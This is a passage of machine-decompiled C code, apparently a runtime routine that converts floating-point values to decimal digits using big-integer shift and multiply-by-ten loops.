														_t166 =  &_v1896;
														 *_t166 = _v1896 & 0x00000000;
														__eflags =  *_t166;
														asm("bsr eax, edi");
														if( *_t166 == 0) {
															_t1178 = 0;
															__eflags = 0;
														} else {
															_t1178 = _t977 + 1;
														}
														_t978 = 0x20;
														_t1264 = _t1113;
														__eflags = _t978 - _t1178 - _t1113;
														_t980 =  &_v460;
														_v1880 = _t980;
														_t1222 = _t980;
														_t171 =  &_v1865;
														 *_t171 = _t978 - _t1178 - _t1113 > 0;
														__eflags =  *_t171;
														while(1) {
															__eflags = _t1264 - _t1064;
															if(_t1264 >= _t1064) {
																_t173 =  &_v1876;
																 *_t173 = _v1876 & 0x00000000;
																__eflags =  *_t173;
															} else {
																_v1876 =  *_t1222;
															}
															_t175 = _t1264 - 1; // 0x0
															__eflags = _t175 - _t1064;
															if(_t175 >= _t1064) {
																_t1179 = 0;
																__eflags = 0;
															} else {
																_t1179 =  *(_t1222 - 4);
															}
															_t1222 = _t1222 - 4;
															_t984 = _v1880;
															_t1264 = _t1264 - 1;
															 *_t984 = _t1179 >> 0x0000001e ^ _v1876 << 0x00000002;
															_v1880 = _t984 - 4;
															__eflags = _t1264 - 0xffffffff;
															if(_t1264 == 0xffffffff) {
																break;
															}
															_t1064 = _v472;
														}
														__eflags = _v1865;
														_t1114 = _t1113 - _v1872;
														_v472 = (0 | _v1865 != 0x00000000) + _t1113;
														_t1224 = _t1114 >> 5;
														_v1884 = _t1114;
														_t1266 = _t1224 << 2;
														E00E7F5F0(_t1224,  &_v1396, 0, _t1266);
														 *(_t1276 + _t1266 - 0x570) = 1 << (_v1884 & 0x0000001f);
														_t806 = _t1224 + 1;
													}
													goto L128;
												}
											}
											goto L101;
										}
										L128:
										_v1400 = _t806;
										_t1067 = 0x1cc;
										_v936 = _t806;
										__eflags = _t806 << 2;
										E00E8B851( &_v932, 0x1cc,  &_v1396, _t806 << 2);
										_t1282 =  &(_t1279[7]);
									} else {
										_v1396 = _v1396 & 0x00000000;
										_t1267 = 2;
										_v1392 = 0x100000;
										_v1400 = _t1267;
										__eflags = _t1064 - _t1267;
										if(_t1064 != _t1267) {
											L53:
											_t995 = _v1872 + 1;
											_t996 = _t995 & 0x0000001f;
											_t1117 = 0x20;
											_v1876 = _t996;
											_t1226 = _t995 >> 5;
											_v1872 = _t1226;
											_v1908 = _t1117 - _t996;
											_t999 = E00E7EA70(1, _t1117 - _t996, 0);
											_t1119 =  *((intOrPtr*)(_t1276 + _t1064 * 4 - 0x1d4));
											_t1000 = _t999 - 1;
											_t108 =  &_v1896;
											 *_t108 = _v1896 & 0x00000000;
											__eflags =  *_t108;
											asm("bsr ecx, ecx");
											_v1884 = _t1000;
											_v1912 =  !_t1000;
											if( *_t108 == 0) {
												_t1120 = 0;
												__eflags = 0;
											} else {
												_t1120 = _t1119 + 1;
											}
											_t1002 = 0x20;
											_t1003 = _t1002 - _t1120;
											_t1184 = _t1064 + _t1226;
											__eflags = _v1876 - _t1003;
											_v1892 = _t1184;
											_t1004 = _t1003 & 0xffffff00 | _v1876 - _t1003 > 0x00000000;
											__eflags = _t1184 - 0x73;
											_v1865 = _t1004;
											_t1121 = _t1120 & 0xffffff00 | _t1184 - 0x00000073 > 0x00000000;
											__eflags = _t1184 - 0x73;
											if(_t1184 != 0x73) {
												L59:
												_t1005 = 0;
												__eflags = 0;
											} else {
												__eflags = _t1004;
												if(_t1004 == 0) {
													goto L59;
												} else {
													_t1005 = 1;
												}
											}
											__eflags = _t1121;
											if(_t1121 != 0) {
												L81:
												__eflags = 0;
												_t1067 = 0x1cc;
												_v1400 = 0;
												_v472 = 0;
												E00E8B851( &_v468, 0x1cc,  &_v1396, 0);
												_t1279 =  &(_t1279[4]);
											} else {
												__eflags = _t1005;
												if(_t1005 != 0) {
													goto L81;
												} else {
													_t1122 = 0x72;
													__eflags = _t1184 - _t1122;
													if(_t1184 >= _t1122) {
														_t1184 = _t1122;
														_v1892 = _t1122;
													}
													_t1015 = _t1184;
													_v1880 = _t1015;
													__eflags = _t1184 - 0xffffffff;
													if(_t1184 != 0xffffffff) {
														_t1185 = _v1872;
														_t1269 = _t1184 - _t1185;
														__eflags = _t1269;
														_t1126 =  &_v468 + _t1269 * 4;
														_v1888 = _t1126;
														while(1) {
															__eflags = _t1015 - _t1185;
															if(_t1015 < _t1185) {
																break;
															}
															__eflags = _t1269 - _t1064;
															if(_t1269 >= _t1064) {
																_t1229 = 0;
																__eflags = 0;
															} else {
																_t1229 =  *_t1126;
															}
															__eflags = _t1269 - 1 - _t1064;
															if(_t1269 - 1 >= _t1064) {
																_t1020 = 0;
																__eflags = 0;
															} else {
																_t1020 =  *(_t1126 - 4);
															}
															_t1023 = _v1880;
															_t1126 = _v1888 - 4;
															_v1888 = _t1126;
															 *(_t1276 + _t1023 * 4 - 0x1d0) = (_t1229 & _v1884) << _v1876 | (_t1020 & _v1912) >> _v1908;
															_t1015 = _t1023 - 1;
															_t1269 = _t1269 - 1;
															_v1880 = _t1015;
															__eflags = _t1015 - 0xffffffff;
															if(_t1015 != 0xffffffff) {
																_t1064 = _v472;
																continue;
															}
															break;
														}
														_t1184 = _v1892;
														_t1226 = _v1872;
														_t1267 = 2;
													}
													__eflags = _t1226;
													if(_t1226 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1226 << 2);
														_t1279 =  &(_t1279[3]);
													}
													__eflags = _v1865;
													_t1067 = 0x1cc;
													if(_v1865 == 0) {
														_v472 = _t1184;
													} else {
														_v472 = _t1184 + 1;
													}
												}
											}
											_v1392 = _v1392 & 0x00000000;
											_v1396 = _t1267;
											_v1400 = 1;
											_v936 = 1;
											_push(4);
										} else {
											_t1130 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((intOrPtr*)(_t1276 + _t1130 - 0x570)) -  *((intOrPtr*)(_t1276 + _t1130 - 0x1d0));
												if( *((intOrPtr*)(_t1276 + _t1130 - 0x570)) !=  *((intOrPtr*)(_t1276 + _t1130 - 0x1d0))) {
													goto L53;
												}
												_t1130 = _t1130 + 4;
												__eflags = _t1130 - 8;
												if(_t1130 != 8) {
													continue;
												} else {
													_t1026 = _v1872 + 2;
													_t1027 = _t1026 & 0x0000001f;
													_t1131 = 0x20;
													_t1132 = _t1131 - _t1027;
													_v1888 = _t1027;
													_t1271 = _t1026 >> 5;
													_v1876 = _t1271;
													_v1908 = _t1132;
													_t1030 = E00E7EA70(1, _t1132, 0);
													_v1896 = _v1896 & 0x00000000;
													_t1031 = _t1030 - 1;
													__eflags = _t1031;
													asm("bsr ecx, edi");
													_v1884 = _t1031;
													_v1912 =  !_t1031;
													if(_t1031 == 0) {
														_t1133 = 0;
														__eflags = 0;
													} else {
														_t1133 = _t1132 + 1;
													}
													_t1033 = 0x20;
													_t1034 = _t1033 - _t1133;
													_t1187 = _t1271 + 2;
													__eflags = _v1888 - _t1034;
													_v1880 = _t1187;
													_t1035 = _t1034 & 0xffffff00 | _v1888 - _t1034 > 0x00000000;
													__eflags = _t1187 - 0x73;
													_v1865 = _t1035;
													_t1134 = _t1133 & 0xffffff00 | _t1187 - 0x00000073 > 0x00000000;
													__eflags = _t1187 - 0x73;
													if(_t1187 != 0x73) {
														L28:
														_t1036 = 0;
														__eflags = 0;
													} else {
														__eflags = _t1035;
														if(_t1035 == 0) {
															goto L28;
														} else {
															_t1036 = 1;
														}
													}
													__eflags = _t1134;
													if(_t1134 != 0) {
														L50:
														__eflags = 0;
														_t1067 = 0x1cc;
														_v1400 = 0;
														_v472 = 0;
														E00E8B851( &_v468, 0x1cc,  &_v1396, 0);
														_t1279 =  &(_t1279[4]);
													} else {
														__eflags = _t1036;
														if(_t1036 != 0) {
															goto L50;
														} else {
															_t1137 = 0x72;
															__eflags = _t1187 - _t1137;
															if(_t1187 >= _t1137) {
																_t1187 = _t1137;
																_v1880 = _t1137;
															}
															_t1138 = _t1187;
															_v1892 = _t1138;
															__eflags = _t1187 - 0xffffffff;
															if(_t1187 != 0xffffffff) {
																_t1188 = _v1876;
																_t1273 = _t1187 - _t1188;
																__eflags = _t1273;
																_t1046 =  &_v468 + _t1273 * 4;
																_v1872 = _t1046;
																while(1) {
																	__eflags = _t1138 - _t1188;
																	if(_t1138 < _t1188) {
																		break;
																	}
																	__eflags = _t1273 - _t1064;
																	if(_t1273 >= _t1064) {
																		_t1235 = 0;
																		__eflags = 0;
																	} else {
																		_t1235 =  *_t1046;
																	}
																	__eflags = _t1273 - 1 - _t1064;
																	if(_t1273 - 1 >= _t1064) {
																		_t1048 = 0;
																		__eflags = 0;
																	} else {
																		_t1048 =  *(_v1872 - 4);
																	}
																	_t1143 = _v1892;
																	 *(_t1276 + _t1143 * 4 - 0x1d0) = (_t1048 & _v1912) >> _v1908 | (_t1235 & _v1884) << _v1888;
																	_t1138 = _t1143 - 1;
																	_t1273 = _t1273 - 1;
																	_t1046 = _v1872 - 4;
																	_v1892 = _t1138;
																	_v1872 = _t1046;
																	__eflags = _t1138 - 0xffffffff;
																	if(_t1138 != 0xffffffff) {
																		_t1064 = _v472;
																		continue;
																	}
																	break;
																}
																_t1187 = _v1880;
																_t1271 = _v1876;
															}
															__eflags = _t1271;
															if(_t1271 != 0) {
																__eflags = 0;
																memset( &_v468, 0, _t1271 << 2);
																_t1279 =  &(_t1279[3]);
															}
															__eflags = _v1865;
															_t1067 = 0x1cc;
															if(_v1865 == 0) {
																_v472 = _t1187;
															} else {
																_v472 = _t1187 + 1;
															}
														}
													}
													_v1392 = _v1392 & 0x00000000;
													_t1041 = 4;
													__eflags = 1;
													_v1396 = _t1041;
													_v1400 = 1;
													_v936 = 1;
													_push(_t1041);
												}
												goto L52;
											}
											goto L53;
										}
										L52:
										_push( &_v1396);
										_push(_t1067);
										_push( &_v932);
										E00E8B851();
										_t1282 =  &(_t1279[4]);
									}
									_t811 = _v1904;
									_t1087 = 0xa;
									_v1912 = _t1087;
									__eflags = _t811;
									if(_t811 < 0) {
										_t812 =  ~_t811;
										_t813 = _t812 / _t1087;
										_v1880 = _t813;
										_t1088 = _t812 % _t1087;
										_v1884 = _t1088;
										__eflags = _t813;
										if(_t813 == 0) {
											L249:
											__eflags = _t1088;
											if(_t1088 != 0) {
												_t852 =  *(0xe97d8c + _t1088 * 4);
												_v1896 = _t852;
												__eflags = _t852;
												if(_t852 == 0) {
													L260:
													__eflags = 0;
													_push(0);
													_v472 = 0;
													_v2408 = 0;
													goto L261;
												} else {
													__eflags = _t852 - 1;
													if(_t852 != 1) {
														_t1099 = _v472;
														__eflags = _t1099;
														if(_t1099 != 0) {
															_t1204 = 0;
															_t1253 = 0;
															__eflags = 0;
															do {
																_t1158 = _t852 *  *(_t1276 + _t1253 * 4 - 0x1d0) >> 0x20;
																 *(_t1276 + _t1253 * 4 - 0x1d0) = _t852 *  *(_t1276 + _t1253 * 4 - 0x1d0) + _t1204;
																_t852 = _v1896;
																asm("adc edx, 0x0");
																_t1253 = _t1253 + 1;
																_t1204 = _t1158;
																__eflags = _t1253 - _t1099;
															} while (_t1253 != _t1099);
															__eflags = _t1204;
															if(_t1204 != 0) {
																_t859 = _v472;
																__eflags = _t859 - 0x73;
																if(_t859 >= 0x73) {
																	goto L260;
																} else {
																	 *(_t1276 + _t859 * 4 - 0x1d0) = _t1204;
																	_v472 = _v472 + 1;
																}
															}
														}
													}
												}
											}
										} else {
											do {
												__eflags = _t813 - 0x26;
												if(_t813 > 0x26) {
													_t813 = 0x26;
												}
												_t1100 =  *(0xe97cf6 + _t813 * 4) & 0x000000ff;
												_v1872 = _t813;
												_v1400 = ( *(0xe97cf6 + _t813 * 4) & 0x000000ff) + ( *(0xe97cf7 + _t813 * 4) & 0x000000ff);
												E00E7F5F0(_t1100 << 2,  &_v1396, 0, _t1100 << 2);
												_t870 = E00E7F750( &(( &_v1396)[_t1100]), 0xe973f0 + ( *(0xe97cf4 + _v1872 * 4) & 0x0000ffff) * 4, ( *(0xe97cf7 + _t813 * 4) & 0x000000ff) << 2);
												_t1101 = _v1400;
												_t1282 =  &(_t1282[6]);
												_v1892 = _t1101;
												__eflags = _t1101 - 1;
												if(_t1101 > 1) {
													__eflags = _v472 - 1;
													if(_v472 > 1) {
														__eflags = _t1101 - _v472;
														_t1207 =  &_v1396;
														_t871 = _t870 & 0xffffff00 | _t1101 - _v472 > 0x00000000;
														__eflags = _t871;
														if(_t871 != 0) {
															_t1159 =  &_v468;
														} else {
															_t1207 =  &_v468;
															_t1159 =  &_v1396;
														}
														_v1908 = _t1159;
														__eflags = _t871;
														if(_t871 == 0) {
															_t1101 = _v472;
														}
														_v1876 = _t1101;
														__eflags = _t871;
														if(_t871 != 0) {
															_v1892 = _v472;
														}
														_t1160 = 0;
														_t1255 = 0;
														_v1864 = 0;
														__eflags = _t1101;
														if(_t1101 == 0) {
															L243:
															_v472 = _t1160;
															_t873 = _t1160 << 2;
															__eflags = _t873;
															_push(_t873);
															_t874 =  &_v1860;
															goto L244;
														} else {
															_t1208 = _t1207 -  &_v1860;
															__eflags = _t1208;
															_v1928 = _t1208;
															do {
																_t881 =  *(_t1276 + _t1208 + _t1255 * 4 - 0x740);
																_v1896 = _t881;
																__eflags = _t881;
																if(_t881 != 0) {
																	_t882 = 0;
																	_t1209 = 0;
																	_t1102 = _t1255;
																	_v1888 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L240:
																		__eflags = _t1102 - 0x73;
																		if(_t1102 == 0x73) {
																			goto L258;
																		} else {
																			_t1208 = _v1928;
																			_t1101 = _v1876;
																			goto L242;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1102 - 0x73;
																			if(_t1102 == 0x73) {
																				goto L235;
																			}
																			__eflags = _t1102 - _t1160;
																			if(_t1102 == _t1160) {
																				 *(_t1276 + _t1102 * 4 - 0x740) =  *(_t1276 + _t1102 * 4 - 0x740) & 0x00000000;
																				_t894 = _t882 + 1 + _t1255;
																				__eflags = _t894;
																				_v1864 = _t894;
																				_t882 = _v1888;
																			}
																			_t889 =  *(_v1908 + _t882 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1276 + _t1102 * 4 - 0x740) =  *(_t1276 + _t1102 * 4 - 0x740) + _t889 * _v1896 + _t1209;
																			asm("adc edx, 0x0");
																			_t882 = _v1888 + 1;
																			_t1102 = _t1102 + 1;
																			_v1888 = _t882;
																			_t1209 = _t889 * _v1896 >> 0x20;
																			_t1160 = _v1864;
																			__eflags = _t882 - _v1892;
																			if(_t882 != _v1892) {
																				continue;
																			} else {
																				goto L235;
																			}
																			while(1) {
																				L235:
																				__eflags = _t1209;
																				if(_t1209 == 0) {
																					goto L240;
																				}
																				__eflags = _t1102 - 0x73;
																				if(_t1102 == 0x73) {
																					goto L258;
																				} else {
																					__eflags = _t1102 - _t1160;
																					if(_t1102 == _t1160) {
																						_t558 = _t1276 + _t1102 * 4 - 0x740;
																						 *_t558 =  *(_t1276 + _t1102 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t558;
																						_t564 = _t1102 + 1; // 0x1
																						_v1864 = _t564;
																					}
																					_t887 = _t1209;
																					_t1209 = 0;
																					 *(_t1276 + _t1102 * 4 - 0x740) =  *(_t1276 + _t1102 * 4 - 0x740) + _t887;
																					_t1160 = _v1864;
																					asm("adc edi, edi");
																					_t1102 = _t1102 + 1;
																					continue;
																				}
																				goto L246;
																			}
																			goto L240;
																		}
																		goto L235;
																	}
																} else {
																	__eflags = _t1255 - _t1160;
																	if(_t1255 == _t1160) {
																		 *(_t1276 + _t1255 * 4 - 0x740) =  *(_t1276 + _t1255 * 4 - 0x740) & _t881;
																		_t526 = _t1255 + 1; // 0x1
																		_t1160 = _t526;
																		_v1864 = _t1160;
																	}
																	goto L242;
																}
																goto L246;
																L242:
																_t1255 = _t1255 + 1;
																__eflags = _t1255 - _t1101;
															} while (_t1255 != _t1101);
															goto L243;
														}
													} else {
														_t1210 = _v468;
														_v472 = _t1101;
														E00E8B851( &_v468, _t1067,  &_v1396, _t1101 << 2);
														_t1282 =  &(_t1282[4]);
														__eflags = _t1210;
														if(_t1210 == 0) {
															goto L203;
														} else {
															__eflags = _t1210 - 1;
															if(_t1210 == 1) {
																goto L245;
															} else {
																__eflags = _v472;
																if(_v472 == 0) {
																	goto L245;
																} else {
																	_t1103 = 0;
																	_v1896 = _v472;
																	_t1256 = 0;
																	__eflags = 0;
																	do {
																		_t903 = _t1210;
																		_t1161 = _t903 *  *(_t1276 + _t1256 * 4 - 0x1d0) >> 0x20;
																		 *(_t1276 + _t1256 * 4 - 0x1d0) = _t903 *  *(_t1276 + _t1256 * 4 - 0x1d0) + _t1103;
																		asm("adc edx, 0x0");
																		_t1256 = _t1256 + 1;
																		_t1103 = _t1161;
																		__eflags = _t1256 - _v1896;
																	} while (_t1256 != _v1896);
																	goto L208;
																}
															}
														}
													}
												} else {
													_t1211 = _v1396;
													__eflags = _t1211;
													if(_t1211 != 0) {
														__eflags = _t1211 - 1;
														if(_t1211 == 1) {
															goto L245;
														} else {
															__eflags = _v472;
															if(_v472 == 0) {
																goto L245;
															} else {
																_t1104 = 0;
																_v1896 = _v472;
																_t1257 = 0;
																__eflags = 0;
																do {
																	_t908 = _t1211;
																	_t1162 = _t908 *  *(_t1276 + _t1257 * 4 - 0x1d0) >> 0x20;
																	 *(_t1276 + _t1257 * 4 - 0x1d0) = _t908 *  *(_t1276 + _t1257 * 4 - 0x1d0) + _t1104;
																	asm("adc edx, 0x0");
																	_t1257 = _t1257 + 1;
																	_t1104 = _t1162;
																	__eflags = _t1257 - _v1896;
																} while (_t1257 != _v1896);
																L208:
																__eflags = _t1103;
																if(_t1103 == 0) {
																	goto L245;
																} else {
																	_t906 = _v472;
																	__eflags = _t906 - 0x73;
																	if(_t906 >= 0x73) {
																		L258:
																		_v2408 = 0;
																		_v472 = 0;
																		E00E8B851( &_v468, _t1067,  &_v2404, 0);
																		_t1282 =  &(_t1282[4]);
																		_t877 = 0;
																	} else {
																		 *(_t1276 + _t906 * 4 - 0x1d0) = _t1103;
																		_v472 = _v472 + 1;
																		goto L245;
																	}
																}
															}
														}
													} else {
														L203:
														_v2408 = 0;
														_v472 = 0;
														_push(0);
														_t874 =  &_v2404;
														L244:
														_push(_t874);
														_push(_t1067);
														_push( &_v468);
														E00E8B851();
														_t1282 =  &(_t1282[4]);
														L245:
														_t877 = 1;
													}
												}
												L246:
												__eflags = _t877;
												if(_t877 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_v472 = _v472 & 0x00000000;
													_push(0);
													L261:
													_push( &_v2404);
													_t855 =  &_v468;
													goto L262;
												} else {
													goto L247;
												}
												goto L263;
												L247:
												_t813 = _v1880 - _v1872;
												__eflags = _t813;
												_v1880 = _t813;
											} while (_t813 != 0);
											_t1088 = _v1884;
											goto L249;
										}
									} else {
										_t911 = _t811 / _t1087;
										_v1908 = _t911;
										_t1105 = _t811 % _t1087;
										_v1896 = _t1105;
										__eflags = _t911;
										if(_t911 == 0) {
											L184:
											__eflags = _t1105;
											if(_t1105 != 0) {
												_t1212 =  *(0xe97d8c + _t1105 * 4);
												__eflags = _t1212;
												if(_t1212 != 0) {
													__eflags = _t1212 - 1;
													if(_t1212 != 1) {
														_t912 = _v936;
														_v1896 = _t912;
														__eflags = _t912;
														if(_t912 != 0) {
															_t1258 = 0;
															_t1106 = 0;
															__eflags = 0;
															do {
																_t913 = _t1212;
																_t1166 = _t913 *  *(_t1276 + _t1106 * 4 - 0x3a0) >> 0x20;
																 *(_t1276 + _t1106 * 4 - 0x3a0) = _t913 *  *(_t1276 + _t1106 * 4 - 0x3a0) + _t1258;
																asm("adc edx, 0x0");
																_t1106 = _t1106 + 1;
																_t1258 = _t1166;
																__eflags = _t1106 - _v1896;
															} while (_t1106 != _v1896);
															__eflags = _t1258;
															if(_t1258 != 0) {
																_t916 = _v936;
																__eflags = _t916 - 0x73;
																if(_t916 >= 0x73) {
																	goto L186;
																} else {
																	 *(_t1276 + _t916 * 4 - 0x3a0) = _t1258;
																	_v936 = _v936 + 1;
																}
															}
														}
													}
												} else {
													L186:
													_v2408 = 0;
													_v936 = 0;
													_push(0);
													goto L190;
												}
											}
										} else {
											do {
												__eflags = _t911 - 0x26;
												if(_t911 > 0x26) {
													_t911 = 0x26;
												}
												_t1107 =  *(0xe97cf6 + _t911 * 4) & 0x000000ff;
												_v1888 = _t911;
												_v1400 = ( *(0xe97cf6 + _t911 * 4) & 0x000000ff) + ( *(0xe97cf7 + _t911 * 4) & 0x000000ff);
												E00E7F5F0(_t1107 << 2,  &_v1396, 0, _t1107 << 2);
												_t929 = E00E7F750( &(( &_v1396)[_t1107]), 0xe973f0 + ( *(0xe97cf4 + _v1888 * 4) & 0x0000ffff) * 4, ( *(0xe97cf7 + _t911 * 4) & 0x000000ff) << 2);
												_t1108 = _v1400;
												_t1282 =  &(_t1282[6]);
												_v1892 = _t1108;
												__eflags = _t1108 - 1;
												if(_t1108 > 1) {
													__eflags = _v936 - 1;
													if(_v936 > 1) {
														__eflags = _t1108 - _v936;
														_t1215 =  &_v1396;
														_t930 = _t929 & 0xffffff00 | _t1108 - _v936 > 0x00000000;
														__eflags = _t930;
														if(_t930 != 0) {
															_t1167 =  &_v932;
														} else {
															_t1215 =  &_v932;
															_t1167 =  &_v1396;
														}
														_v1876 = _t1167;
														__eflags = _t930;
														if(_t930 == 0) {
															_t1108 = _v936;
														}
														_v1880 = _t1108;
														__eflags = _t930;
														if(_t930 != 0) {
															_v1892 = _v936;
														}
														_t1168 = 0;
														_t1260 = 0;
														_v1864 = 0;
														__eflags = _t1108;
														if(_t1108 == 0) {
															L177:
															_v936 = _t1168;
															_t932 = _t1168 << 2;
															__eflags = _t932;
															goto L178;
														} else {
															_t1216 = _t1215 -  &_v1860;
															__eflags = _t1216;
															_v1928 = _t1216;
															do {
																_t940 =  *(_t1276 + _t1216 + _t1260 * 4 - 0x740);
																_v1884 = _t940;
																__eflags = _t940;
																if(_t940 != 0) {
																	_t941 = 0;
																	_t1217 = 0;
																	_t1109 = _t1260;
																	_v1872 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L174:
																		__eflags = _t1109 - 0x73;
																		if(_t1109 == 0x73) {
																			goto L187;
																		} else {
																			_t1216 = _v1928;
																			_t1108 = _v1880;
																			goto L176;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1109 - 0x73;
																			if(_t1109 == 0x73) {
																				goto L169;
																			}
																			__eflags = _t1109 - _t1168;
																			if(_t1109 == _t1168) {
																				 *(_t1276 + _t1109 * 4 - 0x740) =  *(_t1276 + _t1109 * 4 - 0x740) & 0x00000000;
																				_t953 = _t941 + 1 + _t1260;
																				__eflags = _t953;
																				_v1864 = _t953;
																				_t941 = _v1872;
																			}
																			_t948 =  *(_v1876 + _t941 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1276 + _t1109 * 4 - 0x740) =  *(_t1276 + _t1109 * 4 - 0x740) + _t948 * _v1884 + _t1217;
																			asm("adc edx, 0x0");
																			_t941 = _v1872 + 1;
																			_t1109 = _t1109 + 1;
																			_v1872 = _t941;
																			_t1217 = _t948 * _v1884 >> 0x20;
																			_t1168 = _v1864;
																			__eflags = _t941 - _v1892;
																			if(_t941 != _v1892) {
																				continue;
																			} else {
																				goto L169;
																			}
																			while(1) {
																				L169:
																				__eflags = _t1217;
																				if(_t1217 == 0) {
																					goto L174;
																				}
																				__eflags = _t1109 - 0x73;
																				if(_t1109 == 0x73) {
																					L187:
																					__eflags = 0;
																					_v2408 = 0;
																					_v936 = 0;
																					_push(0);
																					_t943 =  &_v2404;
																					goto L188;
																				} else {
																					__eflags = _t1109 - _t1168;
																					if(_t1109 == _t1168) {
																						_t370 = _t1276 + _t1109 * 4 - 0x740;
																						 *_t370 =  *(_t1276 + _t1109 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t370;
																						_t376 = _t1109 + 1; // 0x1
																						_v1864 = _t376;
																					}
																					_t946 = _t1217;
																					_t1217 = 0;
																					 *(_t1276 + _t1109 * 4 - 0x740) =  *(_t1276 + _t1109 * 4 - 0x740) + _t946;
																					_t1168 = _v1864;
																					asm("adc edi, edi");
																					_t1109 = _t1109 + 1;
																					continue;
																				}
																				goto L181;
																			}
																			goto L174;
																		}
																		goto L169;
																	}
																} else {
																	__eflags = _t1260 - _t1168;
																	if(_t1260 == _t1168) {
																		 *(_t1276 + _t1260 * 4 - 0x740) =  *(_t1276 + _t1260 * 4 - 0x740) & _t940;
																		_t338 = _t1260 + 1; // 0x1
																		_t1168 = _t338;
																		_v1864 = _t1168;
																	}
																	goto L176;
																}
																goto L181;
																L176:
																_t1260 = _t1260 + 1;
																__eflags = _t1260 - _t1108;
															} while (_t1260 != _t1108);
															goto L177;
														}
													} else {
														_t1218 = _v932;
														_v936 = _t1108;
														E00E8B851( &_v932, _t1067,  &_v1396, _t1108 << 2);
														_t1282 =  &(_t1282[4]);
														__eflags = _t1218;
														if(_t1218 != 0) {
															__eflags = _t1218 - 1;
															if(_t1218 == 1) {
																goto L180;
															} else {
																__eflags = _v936;
																if(_v936 == 0) {
																	goto L180;
																} else {
																	_t1110 = 0;
																	_v1884 = _v936;
																	_t1261 = 0;
																	__eflags = 0;
																	do {
																		_t961 = _t1218;
																		_t1169 = _t961 *  *(_t1276 + _t1261 * 4 - 0x3a0) >> 0x20;
																		 *(_t1276 + _t1261 * 4 - 0x3a0) = _t961 *  *(_t1276 + _t1261 * 4 - 0x3a0) + _t1110;
																		asm("adc edx, 0x0");
																		_t1261 = _t1261 + 1;
																		_t1110 = _t1169;
																		__eflags = _t1261 - _v1884;
																	} while (_t1261 != _v1884);
																	goto L149;
																}
															}
														} else {
															_v1400 = 0;
															_v936 = 0;
															_push(0);
															_t933 =  &_v1396;
															goto L179;
														}
													}
												} else {
													_t1219 = _v1396;
													__eflags = _t1219;
													if(_t1219 != 0) {
														__eflags = _t1219 - 1;
														if(_t1219 == 1) {
															goto L180;
														} else {
															__eflags = _v936;
															if(_v936 == 0) {
																goto L180;
															} else {
																_t1111 = 0;
																_v1884 = _v936;
																_t1262 = 0;
																__eflags = 0;
																do {
																	_t968 = _t1219;
																	_t1170 = _t968 *  *(_t1276 + _t1262 * 4 - 0x3a0) >> 0x20;
																	 *(_t1276 + _t1262 * 4 - 0x3a0) = _t968 *  *(_t1276 + _t1262 * 4 - 0x3a0) + _t1111;
																	asm("adc edx, 0x0");
																	_t1262 = _t1262 + 1;
																	_t1111 = _t1170;
																	__eflags = _t1262 - _v1884;
																} while (_t1262 != _v1884);
																L149:
																__eflags = _t1110;
																if(_t1110 == 0) {
																	goto L180;
																} else {
																	_t964 = _v936;
																	__eflags = _t964 - 0x73;
																	if(_t964 < 0x73) {
																		 *(_t1276 + _t964 * 4 - 0x3a0) = _t1110;
																		_v936 = _v936 + 1;
																		goto L180;
																	} else {
																		_v1400 = 0;
																		_v936 = 0;
																		_push(0);
																		_t943 =  &_v1396;
																		L188:
																		_push(_t943);
																		_push(_t1067);
																		_push( &_v932);
																		E00E8B851();
																		_t1282 =  &(_t1282[4]);
																		_t936 = 0;
																	}
																}
															}
														}
													} else {
														_t932 = 0;
														_v1864 = 0;
														_v936 = 0;
														L178:
														_push(_t932);
														_t933 =  &_v1860;
														L179:
														_push(_t933);
														_push(_t1067);
														_push( &_v932);
														E00E8B851();
														_t1282 =  &(_t1282[4]);
														L180:
														_t936 = 1;
													}
												}
												L181:
												__eflags = _t936;
												if(_t936 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_t404 =  &_v936;
													 *_t404 = _v936 & 0x00000000;
													__eflags =  *_t404;
													_push(0);
													L190:
													_push( &_v2404);
													_t855 =  &_v932;
													L262:
													_push(_t1067);
													_push(_t855);
													E00E8B851();
													_t1282 =  &(_t1282[4]);
												} else {
													goto L182;
												}
												goto L263;
												L182:
												_t911 = _v1908 - _v1888;
												__eflags = _t911;
												_v1908 = _t911;
											} while (_t911 != 0);
											_t1105 = _v1896;
											goto L184;
										}
									}
									L263:
									_t1199 = _v1920;
									_t1248 = _t1199;
									_t1089 = _v472;
									_v1872 = _t1248;
									__eflags = _t1089;
									if(_t1089 != 0) {
										_t1252 = 0;
										_t1203 = 0;
										__eflags = 0;
										do {
											_t844 =  *(_t1276 + _t1203 * 4 - 0x1d0);
											_t1156 = 0xa;
											_t1157 = _t844 * _t1156 >> 0x20;
											 *(_t1276 + _t1203 * 4 - 0x1d0) = _t844 * _t1156 + _t1252;
											asm("adc edx, 0x0");
											_t1203 = _t1203 + 1;
											_t1252 = _t1157;
											__eflags = _t1203 - _t1089;
										} while (_t1203 != _t1089);
										_v1896 = _t1252;
										__eflags = _t1252;
										_t1248 = _v1872;
										if(_t1252 != 0) {
											_t1098 = _v472;
											__eflags = _t1098 - 0x73;
											if(_t1098 >= 0x73) {
												__eflags = 0;
												_v2408 = 0;
												_v472 = 0;
												E00E8B851( &_v468, _t1067,  &_v2404, 0);
												_t1282 =  &(_t1282[4]);
											} else {
												 *(_t1276 + _t1098 * 4 - 0x1d0) = _t1157;
												_v472 = _v472 + 1;
											}
										}
										_t1199 = _t1248;
									}
									_t816 = E00E8CEB0( &_v472,  &_v936);
									_t1149 = 0xa;
									__eflags = _t816 - _t1149;
									if(_t816 != _t1149) {
										__eflags = _t816;
										if(_t816 != 0) {
											_t817 = _t816 + 0x30;
											__eflags = _t817;
											_t1248 = _t1199 + 1;
											 *_t1199 = _t817;
											_v1872 = _t1248;
											goto L282;
										} else {
											_t818 = _v1904 - 1;
										}
									} else {
										_v1904 = _v1904 + 1;
										_t1248 = _t1199 + 1;
										_t835 = _v936;
										 *_t1199 = 0x31;
										_v1872 = _t1248;
										__eflags = _t835;
										if(_t835 != 0) {
											_t1202 = 0;
											_t1251 = _t835;
